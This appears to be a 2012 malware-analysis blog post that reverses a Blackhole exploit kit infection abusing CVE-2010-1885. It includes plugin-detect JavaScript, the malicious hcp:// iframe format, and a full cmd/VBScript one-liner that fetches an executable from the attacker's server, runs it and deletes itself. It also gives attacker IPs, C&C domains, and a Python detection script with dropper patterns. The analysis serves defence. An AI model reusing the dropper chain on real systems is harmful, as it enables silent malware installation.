Wednesday, September 19, 2012

"Geek" Way in Reversing #CVE-2010-1885 Infection via PluginDetect Script/Blackhole EK (85.17.165.22)

Just finished handling a local infection case today; behind this case is the beloved Blackhole exploit kit. Some WinXP machines, because of third-party software compatibility trouble, can't install Microsoft's critical patch (MS10-042) properly. This patch covers the infamous CVE-2010-1885, a critical vulnerability in the MPC::HexToNum function of helpctr.exe (a.k.a. the hcp:// URL flaw). These clients accidentally opened a spam mail containing the BHEK infected URL (some of you like to call it the "BHEK landing page"), downloading a payload which the installed antivirus software cannot even detect yet.

That just happened today and it really made my day. Since the flaw was fixed by Microsoft about 2 years ago I never expected to see unpatched systems still carrying it, yet they do exist, a bunch of them. Since there is some possibility that other XP users carry a similar risk, I dared myself to write up the reversing of this infection, for your information when handling a similar case.

The infector was a BHEK at 85.17.165.22, which looks to have been up for less than 24h,
with reports here --->>[URL-QUERY-LINK]
The landing page is:  h00p://85.17.165.22/main.php?page=9adab93ef87c3421

And it has the below infection components:
/Gam.jar           EXPL: Java/2012-1723 (see explanation below)
/data/field.swf    EXPL: SWF/Cve-2011-0611 ---> shellcode --> same payload
/data/ap1.php      EXPL: JS/PDF.PdfCtrl old ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/data/ap2.php      EXPL: JS/PDF.PdfCtrl new ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/w.php?f=f4dfb&e=1 EXPL: Java/2012-1723 SAV: Gam.Jar --> Shellcode --> SAV: same payload
/w.php?f=f4dfb&e=2 EXPL: CVE-2010-2561/msxml2.XMLHTTP SAV: .//..//6f9d07d.exe --> same payload
/w.php?f=f4dfb&e=5 EXPL: CVE-2010-1885/HCP vuln SAV: %TEMP%\file.exe
↑Look at the last line closely; this is the case I will describe here. If you deobfuscate the landing page well, you'll see the BHEK plugin detect. Just in case, you can see my neutralized deobfuscated code here: --->>[PASTEBIN]. At line 1790 you will see code like this:
Function spl4(){
  try {
    For (var i = O, m; i < navigator・plugins・length; i ++ ){
      var name = navigator・plugins「i」.name;
      iF (name.indexOF('Media Player') !=- 1){
        m = document・createElement('IFRAM3');
        m.setAttribute('src', './data/hhcp.php?c=F4dFb');
        m.setAttribute('width', O);
        m.setAttribute('height', O);
        document・body「'appendChild'」(m)
      }
Which will lead you to the downloaded HTML file at:
h00p://85.17.165.22/data/hhcp.php?c=F4dFb
This file contains more obfuscated code: the eval can be decoded as per the pic below, into an iframe that carries the exploit and also an arbitrary command execution. The format of the malicious iframe is as follows:
<iframe src="xxxxx=<script defer>Run(yyyyy);</script>">
//legends:
xxxxx=CVE-2010-1885 PoC strings
yyyyy=arbitrary executable command
If you compare "xxxxx" with the PoC of CVE-2010-1885 you'll see the similarity; ↑here's the PoC link-->http://seclists.org/fulldisclosure/2010/Jun/205. Next, the "yyyyy" is a combination of cmd and Windows (Visual Basic) Script commands:
cmd /c echo FileName = "%TEMP%\file・exe">>%TEMP%\
 go・vbs&&echo url="http://x・x・x・x/w・php?f=f4dfb&e=5" >>%TEMP%\
 go・vbs&&echo Set objHTTP = CreateObject("MSXML2・XMLHTTP")>>%TEMP%\
 go・vbs&&echo Call objHTTP・Open("GET", url, False)>>%TEMP%\
 go・vbs&&echo objHTTP・Send>>%TEMP%\
 go・vbs&&echo set oStream = createobject("Adodb・Stream")>>%TEMP%\
 go・vbs&&echo Const adTypeBinary = 1 >>%TEMP%\
 go・vbs&&echo Const adSaveCreateOverWrite = 2 >>%TEMP%\
 go・vbs&&echo Const adSaveCreateNotExist = 1 >>%TEMP%\
 go・vbs&&echo oStream・type = adTypeBinary >>%TEMP%\
 go・vbs&&echo oStream・open >>%TEMP%\
 go・vbs&&echo oStream・write objHTTP・responseBody>>%TEMP%\
 go・vbs&&echo oStream・savetofile FileName, adSaveCreateNotExist >>%TEMP%\
 go・vbs&&echo oStream・close>>%TEMP%\
 go・vbs&&echo set oStream = nothing >>%TEMP%\
 go・vbs&&echo Set xml = Nothing >>%TEMP%\
 go・vbs&&echo Set WshShell = CreateObject("WScript・Shell") >>%TEMP%\
 go・vbs&&echo WshShell・Run FileName, 0, True >>%TEMP%\
 go・vbs&&echo Set FSO = CreateObject("Scripting・FileSystemObject") >>%TEMP%\
 go・vbs&&echo FSO・DeleteFile "%TEMP%\go・vbs" >>%TEMP%\
 go・vbs|cscript %TEMP%\
 go・vbs>nul
(PS: the above code was neutralized and NOT malicious!)
↑Which means:
Download the file from 85.17.165.22/w・php?f=f4dfb&e=5 and save it to %TEMP%\file.exe via an MSXML2・XMLHTTP request and an ADODB stream, then run it via WshShell.Run and DELETE the saved file afterwards. (This was the reason I couldn't get the sample file from the infected PC and had to extract it out of memory manually.)
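As an added defender-side example (not code from the original post, the kit, or the author), here is a small Python triage script that flags the iframe format described above and pulls the download URL and drop path out of a captured page. The sample page inside it is constructed to match that format, with the hcp:// PoC portion replaced by a placeholder; the function names are my own.

```python
import html
import re

# Constructed sample (not from the post) mimicking the iframe format described above:
# an hcp:// src (the helpctr.exe URL handler fixed by MS10-042) carrying a deferred
# <script> that hands the cmd/VBScript downloader one-liner to Run(). The PoC part of
# the hcp:// URL is a placeholder, not a working trigger. Quotes and ampersands are
# HTML-escaped, as they have to be inside an attribute value.
SAMPLE_HTML = r'''<html><body>
<iframe src="hcp://[POC-STRING-PLACEHOLDER]=<script defer>Run('cmd /c echo FileName = &quot;%TEMP%\file.exe&quot;>>%TEMP%\go.vbs&amp;&amp;echo url=&quot;http://x.x.x.x/w.php?f=f4dfb&amp;e=5&quot; >>%TEMP%\go.vbs&amp;&amp;echo Set objHTTP = CreateObject(&quot;MSXML2.XMLHTTP&quot;)>>%TEMP%\go.vbs&amp;&amp;echo set oStream = createobject(&quot;Adodb.Stream&quot;)>>%TEMP%\go.vbs&amp;&amp;echo WshShell.Run FileName, 0, True >>%TEMP%\go.vbs&amp;&amp;echo FSO.DeleteFile &quot;%TEMP%\go.vbs&quot; >>%TEMP%\go.vbs|cscript %TEMP%\go.vbs>nul');</script>">
</body></html>'''
BENIGN_HTML = '<html><body><iframe src="https://example.com/widget" width="0"></iframe></body></html>'

# hcp: has no business in a web page's <iframe src>; it only ever reaches helpctr.exe.
HCP_IFRAME = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']?\s*hcp:', re.I)
# Building blocks of the download-save-run-delete one-liner the post walks through.
DROPPER_INDICATORS = {
    "cmd_echo_to_vbs": re.compile(r'cmd\s*/c\s*echo\b.*?>>\s*%TEMP%\\\S+?\.vbs', re.I | re.S),
    "msxml_xmlhttp": re.compile(r'MSXML2\.XMLHTTP', re.I),
    "adodb_stream": re.compile(r'Adodb\.Stream', re.I),
    "wscript_run": re.compile(r'WshShell\.Run|CreateObject\(\s*"WScript\.Shell"', re.I),
    "cscript_temp": re.compile(r'\bcscript\s+%TEMP%\\', re.I),
    "self_delete": re.compile(r'\.DeleteFile\b', re.I),
}
DOWNLOAD_URL = re.compile(r'\burl\s*=\s*"(https?://[^"]+)"', re.I)
DROP_PATH = re.compile(r'\bFileName\s*=\s*"([^"]+)"', re.I)

def scan_html(text):
    """Triage one captured landing/iframe page; returns what to block and hunt for."""
    decoded = html.unescape(text)  # scan the attribute value as the browser sees it
    hits = [name for name, rx in DROPPER_INDICATORS.items() if rx.search(decoded)]
    return {
        "hcp_iframe": bool(HCP_IFRAME.search(decoded)),
        "dropper_indicators": hits,
        "download_urls": DOWNLOAD_URL.findall(decoded),  # the w.php?...&e=5 payload URL
        "drop_paths": DROP_PATH.findall(decoded),        # where the payload lands
    }

def verdict(report):
    """An hcp iframe alone flags MS10-042 abuse; two+ dropper blocks confirm the chain."""
    if report["hcp_iframe"] and len(report["dropper_indicators"]) >= 2:
        return "cve-2010-1885-dropper"
    if report["hcp_iframe"]:
        return "hcp-iframe"
    return "clean"

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        r = scan_html(page)
        print(label, verdict(r), r["download_urls"], r["drop_paths"])
```

Feed it the saved hhcp.php response (or any proxy-captured HTML) and block the extracted download URL at the egress proxy while hunting for the drop path on the endpoints.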
The worst part is that almost everyone misses this tiny obfuscated file; even on VirusTotal ONLY 3 (three) products detect it:
MD5: 5629b24e0faae7b42127df9f592fed48
File size: 5.2 KB ( 5326 bytes )
File name: hhcp.php@c=f4dfb
File type: HTML
Tags: html cve-2010-1885 exploit
Detection: 3 / 43
Analysis date: 2012-09-19 19:36:44 UTC ( 1 hour, 7 minutes ago )
URL: ------>>[VIRUS-TOTAL]
Furthermore, the payload shows this "Fake" Intel logo (see pic), and runs both of these processes:
PID MEM        PATH                Event    
216 2007536674 %path%unknown.exe   Global\crypt32LogoffEvent //Stays as process
840 2088831062 %System%svchost.exe //Kicking off svchost
I don't have enough time to do a deep analysis of this binary, so a quick one then.. Binary snapshot:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9    .....j...j...j..
0090   EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9    .I...j...j...j..
00A0   73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9    sJ...j...I...j..
00B0   82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9    .u...j..Rich.j..
00C0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00    ........PE..L...
00D0   A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01    .xWP............
Section:
   .text  0x44000(snipped)
   .rdata 0x45000 0x2d84 11776
   .data  0x48000 0xd38 3584
   .adata 0x49000 0x10 512
   .CRT   0x4b000 0x10 512 <--- cryptor pack
   .rsrc  0x4c000 0x1a18 7168 
Entry Point: 0x1e490
Compile Time: 0x505778A8 [Mon Sep 17 19:23:20 2012 UTC]
Packer: unknown
In short, some suspicious calls were detected while it stays resident as a process.. Below is my adventure in the reversing graph, the way it steals so much info; I guess it is a variant of the ZeuS Trojan, a.k.a. ZeuS/Zbot↓ In the meantime VirusTotal detects it as per below:
MD5: c559573fc5ab9862607e4fa4b2edfc04
File size: 294.0 KB ( 301056 bytes )
File name: unknown.exe
File type: Win32 EXE
Detection: 19 / 43
Analysis date: 2012-09-19 17:58:31 UTC ( 1 minute ago )
URL:---->>[VIRUS-TOTAL]
The current malware names are:
F-Secure                 : Trojan.Generic.KD.731435
Microsoft                : PWS:Win32/Zbot
VIPRE                    : Trojan.Win32.Generic!BT
Symantec                 : Trojan.Gen
TrendMicro               : TROJ_GEN.R42CDII
McAfee-GW-Edition        : PWS-Zbot.vo!a
Fortinet                 : W32/Androm.DW!tr
TrendMicro-HouseCall     : TROJ_GEN.R42CDII
Avast                    : Win32:Trojan-gen
Ikarus                   : Trojan-Spy.Win32.Zbot
GData                    : Trojan.Generic.KD.731435
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Trojan.Generic.KD.731435
McAfee                   : PWS-Zbot.gen.ana
Panda                    : Trj/Genetic.gen
AhnLab-V3                : Spyware/Win32.Zbot
AntiVir                  : TR/Injector.air.1
Sophos                   : Mal/EncPk-AGK
Comodo                   : UnclassifiedMalware
The moral of the story is: do not underestimate "any" exploit implemented in an exploit kit. Those exploits are picked carefully and are meant for a well-planned infection, even the one you think has the smallest chance to infect. When it hits, you may get yourself an epidemic.

And, to malware analysts/researchers (etc.): understanding how an infection works by reversing the malicious and exploit code yourself will change the way you think about handling malware in the future, trust me. You may continue with whatever automation system/tool you use, but at least once, try to figure it out by yourself! I won't sell you no crap.

#MalwareMustDie!

2 comments:

  1. Based on following the domain names used in the malware (salesalesalesale.ru and hluyujgygj.ru) we can see that the first C&C was associated with Citadel (https://zeustracker.abuse.ch/monitor.php?host=salesalesalesale.ru - now NXDOMAIN) and the second is not as well known; I have submitted it to be taken down. #MalwareMustDie

  2. Thanks for your kind response & great follow-up! We published a good obfuscation tool method for deobfuscation of pseudorandom code in the newest post, feel free to check!
